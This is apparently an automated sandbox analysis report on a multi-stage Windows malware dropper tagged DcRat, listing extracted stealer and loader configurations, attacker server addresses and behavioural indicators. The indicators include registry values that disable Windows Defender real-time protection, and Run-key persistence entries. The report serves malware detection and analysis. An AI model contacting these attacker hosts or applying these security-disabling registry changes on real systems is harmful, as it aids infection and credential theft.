dcrat | cb7d7fe72bdc9b5c0da00a175ad4354037473b71f8a9fd763d798c84c44467c0

Analysis

max time kernel
100s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220721-en
resource tags

arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
submitted
06-08-2022 16:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe
Size

5.2MB
MD5

d6c4b18be0a99d5f8ae5c23449bb5ad8
SHA1

05eea6a2a013a26aa9ca335eb251555a9817fed4
SHA256

cb7d7fe72bdc9b5c0da00a175ad4354037473b71f8a9fd763d798c84c44467c0
SHA512

9a78c4746c10a7580275acd6ac9717db1bc4c3c7341f694c79746cc4617223fe0c02e3305695a8cd2ee52974ce0c5f41577ba04fee2db8e8b9d728928f66f50a

Malware Config

Extracted

Family

privateloader

http://45.133.1.182/proxies.txt

http://45.133.1.107/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

51.178.186.149

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

vidar

Version

41.1

Botnet

706

https://mas.to/@bardak1ho

Attributes

profile_id
706

Extracted

Family

redline

194.36.177.7:39556

185.106.92.8:38644

Attributes

auth_value
37f7baab2f9c2105ad605cd792dbb4ca

Extracted

Family

redline

Botnet

media26

91.121.67.60:62102

Extracted

Family

redline

Botnet

@StealFate

135.125.40.64:15456

Extracted

Family

redline

Botnet

@Hfcdvjjdsxvb

62.204.41.144:14096

Attributes

auth_value
3cdd2c9ef6ff679049ae2102ffacce1f

Extracted

Family

raccoon

Botnet

109c5b577d4bc7aa7c26c1a8a3b55988

http://46.249.58.152/

rc4.plain

Extracted

Family

redline

Botnet

druwe

65.108.27.131:45256

Attributes

auth_value
621d7bfdca33d83a8267afd81f2628f6

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

SHIsoob4Etj_lU6f_UIAVLsv.exeTue07006d6b7c.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	SHIsoob4Etj_lU6f_UIAVLsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Tue07006d6b7c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Tue07006d6b7c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	SHIsoob4Etj_lU6f_UIAVLsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Tue07006d6b7c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Tue07006d6b7c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	SHIsoob4Etj_lU6f_UIAVLsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	SHIsoob4Etj_lU6f_UIAVLsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	SHIsoob4Etj_lU6f_UIAVLsv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Tue07006d6b7c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Tue07006d6b7c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	SHIsoob4Etj_lU6f_UIAVLsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Tue07006d6b7c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	SHIsoob4Etj_lU6f_UIAVLsv.exe

OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4896	1200	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	236840	1200	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	11160	1200	rundll32.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/7536-428-0x0000000000400000-0x0000000000411000-memory.dmp	family_raccoon
behavioral2/memory/7536-431-0x0000000000400000-0x0000000000411000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2712-262-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/2712-264-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral2/memory/3968-323-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral2/memory/287544-378-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/283080-384-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/11288-481-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

Tue07caa83bac5d15.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions Tue07caa83bac5d15.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions	Tue07caa83bac5d15.exe

OnlyLogger payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4132-263-0x0000000002D20000-0x0000000002D68000-memory.dmp	family_onlylogger
behavioral2/memory/4132-269-0x0000000000400000-0x0000000002BA9000-memory.dmp	family_onlylogger

Vidar Stealer 3 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/3852-252-0x0000000000400000-0x0000000002BFB000-memory.dmp	family_vidar
behavioral2/memory/3852-276-0x0000000003170000-0x0000000003244000-memory.dmp	family_vidar
behavioral2/memory/3852-284-0x0000000000400000-0x0000000002BFB000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libcurl.dll	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 58 IoCs

Processes:

setup_installer.exesetup_install.exeTue07ef9e317e0f6ae.exeTue072fdbb8e4b2f5.exeTue07e35cf558.exeTue07a633a94f9.exeTue070aab9bc86b572.exeTue07caa83bac5d15.exeTue07b3bf87d8.exeTue07267c17f2f5.exeTue071e59dc8292b4ef1.exeTue07816149b72db00.exeTue07e35cf558.tmpTue0750373995e75.exeTue0741bc096fd881d2.exeTue07006d6b7c.exeTue078a285ef7.exeSkVPVS3t6Y8W.EXeTue0750373995e75.exeTue07caa83bac5d15.exeTue07caa83bac5d15.exeNiceProcessX64.bmp.exeService.exe.exenewfile.exe.exed6cc75213b4f19cbc07bb687f4b12dcc.exe.exeinstalloid.exe911.bmp.exezaebalidelete2_2.bmp.exe0.bmp.exeMixruzki1.bmp.exebezo.bmp.exeSetupMX_1.bmp.exewam.bmp.exeblb0l.bmp.exeBKqUCEa.bmp.exeLammings.bmp.exemanager_like_1.bmp.exeHfcdvjjdsxvb_crypted_1.bmp.exezxc_team_1.bmp.exeyaeblan_v0.7b_2133_windows_64.exeFenix_2.bmp.exeinstal.exeSHIsoob4Etj_lU6f_UIAVLsv.exe911.bmp.exeLammings.bmp.exeSETUP_~4.EXENiceProcessX64.bmp.exeLammings.bmp.exeLammings.bmp.exesetup331.exe.exeddoAKFf.exe.exeAjyTbkN.exe.exemixinte.bmp.exeFWsDwwvaVRZQ.bmp.exed6cc75213b4f19cbc07bb687f4b12dcc.exe.exechrome.exe.exeB2BCH2.exe.exeB2BCH2.exe.tmp

pid	process
3452	setup_installer.exe
3496	setup_install.exe
4416	Tue07ef9e317e0f6ae.exe
4088	Tue072fdbb8e4b2f5.exe
4048	Tue07e35cf558.exe
4764	Tue07a633a94f9.exe
912	Tue070aab9bc86b572.exe
2052	Tue07caa83bac5d15.exe
4212	Tue07b3bf87d8.exe
4216	Tue07267c17f2f5.exe
3852	Tue071e59dc8292b4ef1.exe
800	Tue07816149b72db00.exe
828	Tue07e35cf558.tmp
764	Tue0750373995e75.exe
2196	Tue0741bc096fd881d2.exe
1664	Tue07006d6b7c.exe
4132	Tue078a285ef7.exe
852	SkVPVS3t6Y8W.EXe
2712	Tue0750373995e75.exe
2248	Tue07caa83bac5d15.exe
3968	Tue07caa83bac5d15.exe
2180	NiceProcessX64.bmp.exe
4356	Service.exe.exe
1360	newfile.exe.exe
4464	d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
4796	installoid.exe
4040	911.bmp.exe
116	zaebalidelete2_2.bmp.exe
2764	0.bmp.exe
4472	Mixruzki1.bmp.exe
4368	bezo.bmp.exe
4108	SetupMX_1.bmp.exe
5008	wam.bmp.exe
4692	blb0l.bmp.exe
3680	BKqUCEa.bmp.exe
1980	Lammings.bmp.exe
3448	manager_like_1.bmp.exe
4460	Hfcdvjjdsxvb_crypted_1.bmp.exe
1244	zxc_team_1.bmp.exe
5100	yaeblan_v0.7b_2133_windows_64.exe
2624	Fenix_2.bmp.exe
5156	instal.exe
44244	SHIsoob4Etj_lU6f_UIAVLsv.exe
56988	911.bmp.exe
172936	Lammings.bmp.exe
247988	SETUP_~4.EXE
248184	NiceProcessX64.bmp.exe
248112	Lammings.bmp.exe
283080	Lammings.bmp.exe
318916	setup331.exe.exe
318976	ddoAKFf.exe.exe
318984	AjyTbkN.exe.exe
318992	mixinte.bmp.exe
319004	FWsDwwvaVRZQ.bmp.exe
319024	d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
319480	chrome.exe.exe
6052	B2BCH2.exe.exe
2572	B2BCH2.exe.tmp

Looks for VMWare Tools registry key 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

Tue07caa83bac5d15.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools Tue07caa83bac5d15.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools	Tue07caa83bac5d15.exe

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/10916-475-0x0000000140000000-0x0000000140684000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Tue07caa83bac5d15.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Tue07caa83bac5d15.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Tue07caa83bac5d15.exe

Checks computer location settings 2 TTPs 13 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exeTue07267c17f2f5.exeSkVPVS3t6Y8W.EXeService.exe.exe911.bmp.exeSHIsoob4Etj_lU6f_UIAVLsv.exesetup331.exe.exeSETUP_~4.EXEsetup_installer.exemshta.exemshta.exemshta.exeTue07006d6b7c.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	Tue07267c17f2f5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	SkVPVS3t6Y8W.EXe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	Service.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	911.bmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	SHIsoob4Etj_lU6f_UIAVLsv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	setup331.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	SETUP_~4.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	Tue07006d6b7c.exe

Loads dropped DLL 14 IoCs

Processes:

setup_install.exeTue07e35cf558.tmprundll32.exerundll32.exerundll32.exerundll32.exemsiexec.exeB2BCH2.exe.tmp

pid	process
3496	setup_install.exe
3496	setup_install.exe
3496	setup_install.exe
3496	setup_install.exe
3496	setup_install.exe
3496	setup_install.exe
828	Tue07e35cf558.tmp
4736	rundll32.exe
3532	rundll32.exe
1848	rundll32.exe
239912	rundll32.exe
319356	msiexec.exe
319356	msiexec.exe
2572	B2BCH2.exe.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

wam.bmp.exeAjyTbkN.exe.exeddoAKFf.exe.exeinstalloid.exe0.bmp.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	wam.bmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	wam.bmp.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	AjyTbkN.exe.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	ddoAKFf.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Installoid = "\"C:\\Program Files (x86)\\Installoid\\installoid.exe\""	installoid.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	0.bmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	0.bmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	AjyTbkN.exe.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	ddoAKFf.exe.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

398 ip-api.com
21 ip-api.com
116 ipinfo.io
117 ipinfo.io
190 ipinfo.io
191 ipinfo.io
256 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
398	ip-api.com
21	ip-api.com
116	ipinfo.io
117	ipinfo.io
190	ipinfo.io
191	ipinfo.io
256	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Tue07caa83bac5d15.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	Tue07caa83bac5d15.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	Tue07caa83bac5d15.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

Tue0750373995e75.exeTue07caa83bac5d15.exeHfcdvjjdsxvb_crypted_1.bmp.exeLammings.bmp.exemanager_like_1.bmp.exe

description	pid	process	target process
PID 764 set thread context of 2712	764	Tue0750373995e75.exe	Tue0750373995e75.exe
PID 2052 set thread context of 3968	2052	Tue07caa83bac5d15.exe	Tue07caa83bac5d15.exe
PID 4460 set thread context of 287544	4460	Hfcdvjjdsxvb_crypted_1.bmp.exe	AppLaunch.exe
PID 1980 set thread context of 283080	1980	Lammings.bmp.exe	Lammings.bmp.exe
PID 3448 set thread context of 318876	3448	manager_like_1.bmp.exe	AppLaunch.exe

Drops file in Program Files directory 5 IoCs

Processes:

Service.exe.exed6cc75213b4f19cbc07bb687f4b12dcc.exe.exeinstalloid.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Service.exe.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Service.exe.exe
File created	C:\Program Files (x86)\Installoid\installoid.exe	d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
File opened for modification	C:\Program Files (x86)\Installoid\installoid.exe	d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
File created	C:\Program Files (x86)\Installoid\config.json	installoid.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 44 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
892	3496	WerFault.exe	setup_install.exe
4568	3852	WerFault.exe	Tue071e59dc8292b4ef1.exe
3704	4132	WerFault.exe	Tue078a285ef7.exe
1980	4736	WerFault.exe	rundll32.exe
4112	4132	WerFault.exe	Tue078a285ef7.exe
4592	4132	WerFault.exe	Tue078a285ef7.exe
4028	4132	WerFault.exe	Tue078a285ef7.exe
2356	4132	WerFault.exe	Tue078a285ef7.exe
3236	4132	WerFault.exe	Tue078a285ef7.exe
5008	4132	WerFault.exe	Tue078a285ef7.exe
4464	4132	WerFault.exe	Tue078a285ef7.exe
4136	4132	WerFault.exe	Tue078a285ef7.exe
5228	4692	WerFault.exe	blb0l.bmp.exe
41132	4472	WerFault.exe	Mixruzki1.bmp.exe
249328	239912	WerFault.exe	rundll32.exe
287660	4472	WerFault.exe	Mixruzki1.bmp.exe
249312	4472	WerFault.exe	Mixruzki1.bmp.exe
2032	318992	WerFault.exe	mixinte.bmp.exe
5956	4472	WerFault.exe	Mixruzki1.bmp.exe
6296	318992	WerFault.exe	mixinte.bmp.exe
6616	4472	WerFault.exe	Mixruzki1.bmp.exe
7036	318992	WerFault.exe	mixinte.bmp.exe
7276	4472	WerFault.exe	Mixruzki1.bmp.exe
7804	318992	WerFault.exe	mixinte.bmp.exe
7960	4472	WerFault.exe	Mixruzki1.bmp.exe
8308	4108	WerFault.exe	SetupMX_1.bmp.exe
8364	318992	WerFault.exe	mixinte.bmp.exe
8532	4368	WerFault.exe	bezo.bmp.exe
8732	4472	WerFault.exe	Mixruzki1.bmp.exe
8840	318992	WerFault.exe	mixinte.bmp.exe
9012	318992	WerFault.exe	mixinte.bmp.exe
9164	4472	WerFault.exe	Mixruzki1.bmp.exe
9292	318992	WerFault.exe	mixinte.bmp.exe
9436	318992	WerFault.exe	mixinte.bmp.exe
10412	10312	WerFault.exe	gcleaner.exe
10724	10312	WerFault.exe	gcleaner.exe
10840	10312	WerFault.exe	gcleaner.exe
10900	10312	WerFault.exe	gcleaner.exe
10996	10312	WerFault.exe	gcleaner.exe
11072	10916	WerFault.exe	rmaa1045.exe
11236	11196	WerFault.exe	rundll32.exe
11272	10312	WerFault.exe	gcleaner.exe
11396	10312	WerFault.exe	gcleaner.exe
11556	4132	WerFault.exe	Tue078a285ef7.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

chrome.exe.exeTue070aab9bc86b572.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	chrome.exe.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	chrome.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue070aab9bc86b572.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue070aab9bc86b572.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue070aab9bc86b572.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	chrome.exe.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

183272 schtasks.exe
183292 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

9328 tasklist.exe
9512 tasklist.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1784 taskkill.exe
2344 taskkill.exe
9232 taskkill.exe
9452 taskkill.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

9644 PING.EXE
9740 PING.EXE
9832 PING.EXE
9576 PING.EXE

pid	process
183272	schtasks.exe
183292	schtasks.exe

pid	process
9328	tasklist.exe
9512	tasklist.exe

pid	process
1784	taskkill.exe
2344	taskkill.exe
9232	taskkill.exe
9452	taskkill.exe

pid	process
9644	PING.EXE
9740	PING.EXE
9832	PING.EXE
9576	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	245	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeTue070aab9bc86b572.exe

pid	process
3128	powershell.exe
3128	powershell.exe
912	Tue070aab9bc86b572.exe
912	Tue070aab9bc86b572.exe
3128	powershell.exe
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084
3084

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3084
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

Tue070aab9bc86b572.exe

pid process

912 Tue070aab9bc86b572.exe

pid	process
3084

pid	process
912	Tue070aab9bc86b572.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Tue072fdbb8e4b2f5.exeTue0741bc096fd881d2.exeTue07816149b72db00.exepowershell.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	4088	Tue072fdbb8e4b2f5.exe
Token: SeCreateTokenPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeAssignPrimaryTokenPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeLockMemoryPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeIncreaseQuotaPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeMachineAccountPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeTcbPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeSecurityPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeTakeOwnershipPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeLoadDriverPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeSystemProfilePrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeSystemtimePrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeProfSingleProcessPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeIncBasePriorityPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeCreatePagefilePrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeCreatePermanentPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeBackupPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeRestorePrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeShutdownPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeDebugPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeAuditPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeSystemEnvironmentPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeChangeNotifyPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeRemoteShutdownPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeUndockPrivilege	2196	Tue0741bc096fd881d2.exe
